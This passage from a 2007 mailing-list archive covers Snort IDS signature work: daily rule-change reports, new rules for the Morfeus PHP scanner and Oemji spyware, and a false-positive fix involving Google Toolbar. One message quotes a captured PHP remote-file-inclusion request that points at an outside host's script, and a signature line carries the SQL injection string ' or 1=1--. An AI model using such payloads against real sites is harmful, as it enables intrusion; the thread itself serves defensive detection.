2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 114 -> Added to bleeding-drop.rules (1): # VERSION 114 -> Added to bleeding-policy.rules (1): #Moved from Malware, this is likely not spyware related -> Added to bleeding-scan.rules (1): #by atomic-penguin, tweak by matt Jonkman to cover other ftp daemons like freeftpd and warftpd -> Added to bleeding-sid-msg.map (3): 2002082 || BLEEDING-EDGE POLICY Unusual User Agent (Client) || url,doc.bleedingthreats.net/2002082 2003464 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) || url,www.warftp.org 2003465 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) || url,www.freeftp.com [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 110 -> Removed from bleeding-drop.rules (1): # VERSION 110 -> Removed from bleeding-policy.rules (1): #Moved from Malware, this is not spyware related -> Removed from bleeding-scan.rules (1): #by atomic-penguin -> Removed from bleeding-sid-msg.map (1): 2002082 || BLEEDING-EDGE POLICY Infotriever Spyware User Agent || url,www.infotriever.com/Intro_SysAdmins.asp From jonkman at bleedingthreats.net Tue Mar 6 18:59:24 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Tue Mar 6 18:57:44 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Wiki out of Beta Message-ID: <45EDBA0C.1050508@bleedingthreats.net> I'm happy to say that the current Wiki format for the bleeding threats documentation system is going to do the trick. Thanks to everyone that sent in tips and helped, and for the compliments. :) For the event manager developers out there, you can officially link references to: http://doc.bleedingthreats.net/SID as in: http://doc.bleedingthreats.net/2002383 The wiki will surely continue to evolve, but the url scheme will remain constant. Entries are updated when a new rev is added, old comments remain of course. For signature authors: when you post a sig please take a moment after it's posted to throw any documentation about it into the wiki. It'll help you down the road if you need to make a change, and will of course help the rest of the community. Even just pasting part of the email thread to the wiki is more than fine. If you'd like to help out and put documentation into older signatures, please feel free to do so. I'm out some prizes and rewards donated by some of our sponsors. Anything you add now would go toward prizes as they get worked out. Thanks all for your help and support. Please dig into the wiki and keep the tips and comments flowing! Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From shirkdog_list at hotmail.com Wed Mar 7 05:57:29 2007 From: shirkdog_list at hotmail.com (M. Shirk) Date: Wed Mar 7 05:57:58 2007 Subject: [Bleeding-sigs] New PHP Attack Tool In-Reply-To: <45EDBA0C.1050508@bleedingthreats.net> Message-ID: Saw this when writing up an analysis example: Pcap data: 47 45 54 20 2F 74 6F 70 2E 70 68 70 3F 6C 61 79 GET /top.php?lay 70 61 74 68 3D 68 74 74 70 3A 2F 2F 32 30 33 2E path=http://203. 31 39 38 2E 36 38 2E 32 33 36 2F 7E 6C 69 73 69 198.68.236/~lisi 72 2F 4D 2E 74 78 74 3F 26 2F 20 48 54 54 50 2F r/M.txt?&/ HTTP/ 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 1.1..Accept: */* 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 ..Accept-Languag 65 3A 20 65 6E 2D 75 73 0D 0A 41 63 63 65 70 74 e: en-us..Accept 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C -Encoding: gzip, 20 64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41 deflate..User-A 67 65 6E 74 3A 20 4D 6F 72 66 65 75 73 20 46 75 gent: Morfeus Fu 63 6B 69 6E 67 20 53 63 61 6E 6E 65 72 0D 0A 48 cking Scanner..H I added an F in the pcre, but you could probably get away with just a Morfeus check, or just use the whole word :-) alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner"; flow: established,to_server; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i"; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm classtype:web-application-attack; sid:666; rev:1;) Shirkdog ' or 1=1-- http://www.shirkdog.us >From: Matt Jonkman >Reply-To: Bleeding Sigs >To: Bleeding Sigs >Subject: [Bleeding-sigs] Bleeding Edge Threats Wiki out of Beta >Date: Tue, 06 Mar 2007 13:59:24 -0500 > >I'm happy to say that the current Wiki format for the bleeding threats >documentation system is going to do the trick. Thanks to everyone that >sent in tips and helped, and for the compliments. :) > >For the event manager developers out there, you can officially link >references to: > >http://doc.bleedingthreats.net/SID > >as in: >http://doc.bleedingthreats.net/2002383 > >The wiki will surely continue to evolve, but the url scheme will remain >constant. Entries are updated when a new rev is added, old comments >remain of course. > >For signature authors: when you post a sig please take a moment after >it's posted to throw any documentation about it into the wiki. It'll >help you down the road if you need to make a change, and will of course >help the rest of the community. Even just pasting part of the email >thread to the wiki is more than fine. > >If you'd like to help out and put documentation into older signatures, >please feel free to do so. I'm out some prizes and rewards donated by >some of our sponsors. Anything you add now would go toward prizes as >they get worked out. > >Thanks all for your help and support. Please dig into the wiki and keep >the tips and comments flowing! > >Matt >-- >-------------------------------------------- >Matthew Jonkman >Bleeding Edge Threats >765-429-0398 >765-807-3060 fax >http://www.bleedingthreats.net >-------------------------------------------- > >PGP: http://www.bleedingthreats.com/mattjonkman.asc > > >_______________________________________________ >Bleeding-sigs mailing list >Bleeding-sigs@bleedingthreats.net >http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs _________________________________________________________________ Don’t miss your chance to WIN 10 hours of private jet travel from Microsoft® Office Live http://clk.atdmt.com/MRT/go/mcrssaub0540002499mrt/direct/01/ From jonkman at bleedingthreats.net Wed Mar 7 12:35:06 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Wed Mar 7 12:37:03 2007 Subject: [Bleeding-sigs] New PHP Attack Tool In-Reply-To: References: Message-ID: <45EEB17A.2020300@bleedingthreats.net> Posting now. Nice catch. That's definitely a unique UA. :) Thanks Shirk Matt M. Shirk wrote: > Saw this when writing up an analysis example: > > Pcap data: > > 47 45 54 20 2F 74 6F 70 2E 70 68 70 3F 6C 61 79 GET /top.php?lay > 70 61 74 68 3D 68 74 74 70 3A 2F 2F 32 30 33 2E path=http://203. > 31 39 38 2E 36 38 2E 32 33 36 2F 7E 6C 69 73 69 198.68.236/~lisi > 72 2F 4D 2E 74 78 74 3F 26 2F 20 48 54 54 50 2F r/M.txt?&/ HTTP/ > 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 1.1..Accept: */* > 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 ..Accept-Languag > 65 3A 20 65 6E 2D 75 73 0D 0A 41 63 63 65 70 74 e: en-us..Accept > 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C -Encoding: gzip, > 20 64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41 deflate..User-A > 67 65 6E 74 3A 20 4D 6F 72 66 65 75 73 20 46 75 gent: Morfeus Fu > 63 6B 69 6E 67 20 53 63 61 6E 6E 65 72 0D 0A 48 cking Scanner..H > > > I added an F in the pcre, but you could probably get away with just a > Morfeus check, or just use the whole word :-) > > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: > "BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner"; flow: > established,to_server; content:"User-Agent\:"; nocase; > pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i"; > reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm > classtype:web-application-attack; sid:666; rev:1;) > > > > Shirkdog > ' or 1=1-- > http://www.shirkdog.us > > > > > >> From: Matt Jonkman >> Reply-To: Bleeding Sigs >> To: Bleeding Sigs >> Subject: [Bleeding-sigs] Bleeding Edge Threats Wiki out of Beta >> Date: Tue, 06 Mar 2007 13:59:24 -0500 >> >> I'm happy to say that the current Wiki format for the bleeding threats >> documentation system is going to do the trick. Thanks to everyone that >> sent in tips and helped, and for the compliments. :) >> >> For the event manager developers out there, you can officially link >> references to: >> >> http://doc.bleedingthreats.net/SID >> >> as in: >> http://doc.bleedingthreats.net/2002383 >> >> The wiki will surely continue to evolve, but the url scheme will remain >> constant. Entries are updated when a new rev is added, old comments >> remain of course. >> >> For signature authors: when you post a sig please take a moment after >> it's posted to throw any documentation about it into the wiki. It'll >> help you down the road if you need to make a change, and will of course >> help the rest of the community. Even just pasting part of the email >> thread to the wiki is more than fine. >> >> If you'd like to help out and put documentation into older signatures, >> please feel free to do so. I'm out some prizes and rewards donated by >> some of our sponsors. Anything you add now would go toward prizes as >> they get worked out. >> >> Thanks all for your help and support. Please dig into the wiki and keep >> the tips and comments flowing! >> >> Matt >> -- >> -------------------------------------------- >> Matthew Jonkman >> Bleeding Edge Threats >> 765-429-0398 >> 765-807-3060 fax >> http://www.bleedingthreats.net >> -------------------------------------------- >> >> PGP: http://www.bleedingthreats.com/mattjonkman.asc >> >> >> _______________________________________________ >> Bleeding-sigs mailing list >> Bleeding-sigs@bleedingthreats.net >> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > > _________________________________________________________________ > Don?t miss your chance to WIN 10 hours of private jet travel from > Microsoft? Office Live > http://clk.atdmt.com/MRT/go/mcrssaub0540002499mrt/direct/01/ > > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Wed Mar 7 18:00:05 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Wed Mar 7 18:00:10 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070307180005.F0A3322C097@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Wed Mar 7 13:00:05 2007 [***] [+++] Added rules: [+++] 2003466 - BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner (bleeding-web.rules) [///] Modified active rules: [///] 2003463 - BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others (bleeding-malware.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 115 -> Added to bleeding-drop.rules (1): # VERSION 115 -> Added to bleeding-sid-msg.map (1): 2003466 || BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner || url,www.webmasterworld.com/search_engine_spiders/3227720.htm -> Added to bleeding-web.rules (1): #by shirkdog [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 114 -> Removed from bleeding-drop.rules (1): # VERSION 114 From scheidell at secnap.net Wed Mar 7 18:10:31 2007 From: scheidell at secnap.net (Michael Scheidell) Date: Wed Mar 7 18:10:57 2007 Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463 Message-ID: <45EF0017.2090308@secnap.net> packet: shows GoogleToolbar, but sig checks for !"Google Toolbar" (notice the space?) do we do regex? "\b?" or something? Sig: #2003463 content:"User-Agent\:"; nocase; content:!"Google Toolbar"; distance:0; pcre:"/User-Agent\:[^\n]+Toolbar/i"; maybe nocase; content:!"Host: toolbar.google.com" instead? Jacob can you verify packets, maybe Google Toolbar does both? 000 : 47 45 54 20 2F 73 65 72 76 69 63 65 2F 75 70 64 GET /service/upd 010 : 61 74 65 3F 61 73 3D 74 62 69 65 26 76 65 72 73 ate?as=tbie&vers 020 : 69 6F 6E 3D 34 2E 30 2E 31 36 30 31 2E 34 39 37 ion=4.0.1601.497 030 : 38 26 6F 73 3D 62 69 67 26 68 6C 3D 65 6E 26 74 8&os=big&hl=en&t 040 : 62 62 72 61 6E 64 3D 47 47 4C 52 26 73 64 3D 63 bbrand=GGLR&sd=c 050 : 6F 6D 26 6F 73 76 65 72 3D 35 2E 31 26 6F 73 73 om&osver=5.1&oss 060 : 70 3D 32 2E 30 26 62 72 6F 77 73 65 72 3D 36 2E p=2.0&browser=6. 070 : 30 2E 32 39 30 30 2E 32 31 38 30 26 72 6C 7A 3D 0.2900.2180&rlz= 080 : 26 69 64 3D 33 32 31 42 38 34 42 37 36 30 32 39 &id=321B84B76029 090 : 37 38 42 32 33 37 44 34 32 30 34 38 34 32 37 36 78B237D420484276 0a0 : 30 31 45 37 31 36 35 30 31 34 38 6F 4A 52 4A 55 01E71650148oJRJU 0b0 : 26 65 78 74 3D 2A 26 64 73 3D 31 20 48 54 54 50 &ext=*&ds=1 HTTP 0c0 : 2F 31 2E 31 0D 0A 52 65 66 65 72 65 72 3A 20 6E /1.1..Referer: n 0d0 : 61 76 63 6C 69 65 6E 74 2E 75 70 64 61 74 65 2F avclient.update/ 0e0 : 65 6E 2F 34 2E 30 2E 31 36 30 31 2E 34 39 37 38 en/4.0.1601.4978 0f0 : 2D 62 69 67 0D 0A 55 73 65 72 2D 41 67 65 6E 74 -big..User-Agent 100 : 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 : Mozilla/4.0 (c 110 : 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 6C ompatible; Googl 120 : 65 54 6F 6F 6C 62 61 72 20 34 2E 30 2E 31 36 30 eToolbar 4.0.160 130 : 31 2E 34 39 37 38 2D 62 69 67 3B 20 57 69 6E 64 1.4978-big; Wind 140 : 6F 77 73 20 58 50 20 35 2E 31 3B 20 4D 53 49 45 ows XP 5.1; MSIE 150 : 20 36 2E 30 2E 32 39 30 30 2E 32 31 38 30 29 0D 6.0.2900.2180). 160 : 0A 48 6F 73 74 3A 20 74 6F 6F 6C 62 61 72 2E 67 .Host: toolbar.g 170 : 6F 6F 67 6C 65 2E 63 6F 6D 0D 0A 0D 0A oogle.com.... From axnjxnind at gmail.com Wed Mar 7 18:43:13 2007 From: axnjxnind at gmail.com (axn jxn) Date: Wed Mar 7 18:43:35 2007 Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463 In-Reply-To: <45EF0017.2090308@secnap.net> References: <45EF0017.2090308@secnap.net> Message-ID: <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com> I'll default to Matt's judgement on this one. Seems to be 6 of one, half dozen of another. Either take the space out of the "Google Toolbar" negation or go with Michael's recommendation of negating Host: toolbar.google.com. Matt, thoughts? Jacob On 3/7/07, Michael Scheidell wrote: > packet: shows GoogleToolbar, but sig checks for !"Google Toolbar" > (notice the space?) do we do regex? "\b?" or something? > > Sig: #2003463 > > content:"User-Agent\:"; nocase; content:!"Google Toolbar"; distance:0; > pcre:"/User-Agent\:[^\n]+Toolbar/i"; > > maybe nocase; content:!"Host: toolbar.google.com" instead? > Jacob can you verify packets, maybe Google Toolbar does both? > > 000 : 47 45 54 20 2F 73 65 72 76 69 63 65 2F 75 70 64 GET /service/upd > 010 : 61 74 65 3F 61 73 3D 74 62 69 65 26 76 65 72 73 ate?as=tbie&vers > 020 : 69 6F 6E 3D 34 2E 30 2E 31 36 30 31 2E 34 39 37 ion=4.0.1601.497 > 030 : 38 26 6F 73 3D 62 69 67 26 68 6C 3D 65 6E 26 74 8&os=big&hl=en&t > 040 : 62 62 72 61 6E 64 3D 47 47 4C 52 26 73 64 3D 63 bbrand=GGLR&sd=c > 050 : 6F 6D 26 6F 73 76 65 72 3D 35 2E 31 26 6F 73 73 om&osver=5.1&oss > 060 : 70 3D 32 2E 30 26 62 72 6F 77 73 65 72 3D 36 2E p=2.0&browser=6. > 070 : 30 2E 32 39 30 30 2E 32 31 38 30 26 72 6C 7A 3D 0.2900.2180&rlz= > 080 : 26 69 64 3D 33 32 31 42 38 34 42 37 36 30 32 39 &id=321B84B76029 > 090 : 37 38 42 32 33 37 44 34 32 30 34 38 34 32 37 36 78B237D420484276 > 0a0 : 30 31 45 37 31 36 35 30 31 34 38 6F 4A 52 4A 55 01E71650148oJRJU > 0b0 : 26 65 78 74 3D 2A 26 64 73 3D 31 20 48 54 54 50 &ext=*&ds=1 HTTP > 0c0 : 2F 31 2E 31 0D 0A 52 65 66 65 72 65 72 3A 20 6E /1.1..Referer: n > 0d0 : 61 76 63 6C 69 65 6E 74 2E 75 70 64 61 74 65 2F avclient.update/ > 0e0 : 65 6E 2F 34 2E 30 2E 31 36 30 31 2E 34 39 37 38 en/4.0.1601.4978 > 0f0 : 2D 62 69 67 0D 0A 55 73 65 72 2D 41 67 65 6E 74 -big..User-Agent > 100 : 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 : Mozilla/4.0 (c > 110 : 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 6C ompatible; Googl > 120 : 65 54 6F 6F 6C 62 61 72 20 34 2E 30 2E 31 36 30 eToolbar 4.0.160 > 130 : 31 2E 34 39 37 38 2D 62 69 67 3B 20 57 69 6E 64 1.4978-big; Wind > 140 : 6F 77 73 20 58 50 20 35 2E 31 3B 20 4D 53 49 45 ows XP 5.1; MSIE > 150 : 20 36 2E 30 2E 32 39 30 30 2E 32 31 38 30 29 0D 6.0.2900.2180). > 160 : 0A 48 6F 73 74 3A 20 74 6F 6F 6C 62 61 72 2E 67 .Host: toolbar.g > 170 : 6F 6F 67 6C 65 2E 63 6F 6D 0D 0A 0D 0A oogle.com.... > > > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > From jonkman at bleedingthreats.net Wed Mar 7 19:01:07 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Wed Mar 7 19:03:36 2007 Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463 In-Reply-To: <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com> References: <45EF0017.2090308@secnap.net> <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com> Message-ID: <45EF0BF3.1050904@bleedingthreats.net> Had a discussion on irc, cunningpike brought this up too. I added a second content negation for it. Current version is here: http://doc.bleedingthreats.net/2003463 I don't think there'll be a huge difference in load on either. Although, negating the host: toolbar.... might be more reliable. Anyone can use that UA string, but it'd be tough to use the google host string. Thoughts? Matt axn jxn wrote: > I'll default to Matt's judgement on this one. Seems to be 6 of one, > half dozen of another. Either take the space out of the "Google > Toolbar" negation or go with Michael's recommendation of negating > Host: toolbar.google.com. Matt, thoughts? > > Jacob > > On 3/7/07, Michael Scheidell wrote: >> packet: shows GoogleToolbar, but sig checks for !"Google Toolbar" >> (notice the space?) do we do regex? "\b?" or something? >> >> Sig: #2003463 >> >> content:"User-Agent\:"; nocase; content:!"Google Toolbar"; distance:0; >> pcre:"/User-Agent\:[^\n]+Toolbar/i"; >> >> maybe nocase; content:!"Host: toolbar.google.com" instead? >> Jacob can you verify packets, maybe Google Toolbar does both? >> >> 000 : 47 45 54 20 2F 73 65 72 76 69 63 65 2F 75 70 64 GET /service/upd >> 010 : 61 74 65 3F 61 73 3D 74 62 69 65 26 76 65 72 73 ate?as=tbie&vers >> 020 : 69 6F 6E 3D 34 2E 30 2E 31 36 30 31 2E 34 39 37 ion=4.0.1601.497 >> 030 : 38 26 6F 73 3D 62 69 67 26 68 6C 3D 65 6E 26 74 8&os=big&hl=en&t >> 040 : 62 62 72 61 6E 64 3D 47 47 4C 52 26 73 64 3D 63 bbrand=GGLR&sd=c >> 050 : 6F 6D 26 6F 73 76 65 72 3D 35 2E 31 26 6F 73 73 om&osver=5.1&oss >> 060 : 70 3D 32 2E 30 26 62 72 6F 77 73 65 72 3D 36 2E p=2.0&browser=6. >> 070 : 30 2E 32 39 30 30 2E 32 31 38 30 26 72 6C 7A 3D 0.2900.2180&rlz= >> 080 : 26 69 64 3D 33 32 31 42 38 34 42 37 36 30 32 39 &id=321B84B76029 >> 090 : 37 38 42 32 33 37 44 34 32 30 34 38 34 32 37 36 78B237D420484276 >> 0a0 : 30 31 45 37 31 36 35 30 31 34 38 6F 4A 52 4A 55 01E71650148oJRJU >> 0b0 : 26 65 78 74 3D 2A 26 64 73 3D 31 20 48 54 54 50 &ext=*&ds=1 HTTP >> 0c0 : 2F 31 2E 31 0D 0A 52 65 66 65 72 65 72 3A 20 6E /1.1..Referer: n >> 0d0 : 61 76 63 6C 69 65 6E 74 2E 75 70 64 61 74 65 2F avclient.update/ >> 0e0 : 65 6E 2F 34 2E 30 2E 31 36 30 31 2E 34 39 37 38 en/4.0.1601.4978 >> 0f0 : 2D 62 69 67 0D 0A 55 73 65 72 2D 41 67 65 6E 74 -big..User-Agent >> 100 : 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 : Mozilla/4.0 (c >> 110 : 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 6C ompatible; Googl >> 120 : 65 54 6F 6F 6C 62 61 72 20 34 2E 30 2E 31 36 30 eToolbar 4.0.160 >> 130 : 31 2E 34 39 37 38 2D 62 69 67 3B 20 57 69 6E 64 1.4978-big; Wind >> 140 : 6F 77 73 20 58 50 20 35 2E 31 3B 20 4D 53 49 45 ows XP 5.1; MSIE >> 150 : 20 36 2E 30 2E 32 39 30 30 2E 32 31 38 30 29 0D 6.0.2900.2180). >> 160 : 0A 48 6F 73 74 3A 20 74 6F 6F 6C 62 61 72 2E 67 .Host: toolbar.g >> 170 : 6F 6F 67 6C 65 2E 63 6F 6D 0D 0A 0D 0A oogle.com.... >> >> >> _______________________________________________ >> Bleeding-sigs mailing list >> Bleeding-sigs@bleedingthreats.net >> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs >> > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From scheidell at secnap.net Thu Mar 8 01:42:00 2007 From: scheidell at secnap.net (Michael Scheidell) Date: Thu Mar 8 01:42:29 2007 Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463 Message-ID: > -----Original Message----- > From: bleeding-sigs-bounces@bleedingthreats.net > [mailto:bleeding-sigs-bounces@bleedingthreats.net] On Behalf > Of Matt Jonkman > Sent: Wednesday, March 07, 2007 2:01 PM > To: Bleeding Sigs > Subject: Re: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463 > > > Had a discussion on irc, cunningpike brought this up too. I > added a second content negation for it. Current version is here: > > http://doc.bleedingthreats.net/2003463 > > I don't think there'll be a huge difference in load on either. > > Although, negating the host: toolbar.... might be more > reliable. Anyone can use that UA string, but it'd be tough to > use the google host string. Thoughts? > IF the google host string is consistent. (and, yes, negating via UA is easy) Just look at what is happening with some of these viruses, starting, what was it, a month ago, 6:30 one Sunday am (eastern time) all of a sudden we get morphing trojan-downloaders, all off a few bytes. However, real hackers (crackers?) don't really need to care about the small, (infitnsimally small) number of companies that can actually track them, I don't think they really care about snort/bleeding edge rules. They can cause enough havoc with the people who won't even patch their systems, let alone those who actually monitor them. -- Michael Scheidell, CTO SECNAP Network Security Privacy and Security Training: (ok, we do a lot more than that) http://www.secnap.com/training From jonkman at bleedingthreats.net Thu Mar 8 16:58:26 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 8 16:57:42 2007 Subject: [Bleeding-sigs] Oemji Spyware sigs Message-ID: <45F040B2.9050608@bleedingthreats.net> >From shirkdog, based on spyware listening post hits: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji)"; flow:to_server,established; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Oemji/i"; classtype:trojan-activity; sid:2003468; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update"; flow:established,to_server; uricontent:"/OemjiSearchPlus.ini" nocase; reference:url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187; sid:2003467; rev:1;) Thanks shirkdog! Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Thu Mar 8 18:00:09 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Thu Mar 8 18:00:11 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070308180009.5D4CF22C0AA@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Thu Mar 8 13:00:09 2007 [***] [+++] Added rules: [+++] 2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules) 2003468 - BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) (bleeding-malware.rules) 2003469 - BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) (bleeding-policy.rules) [///] Modified active rules: [///] 2003463 - BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware (bleeding-malware.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound 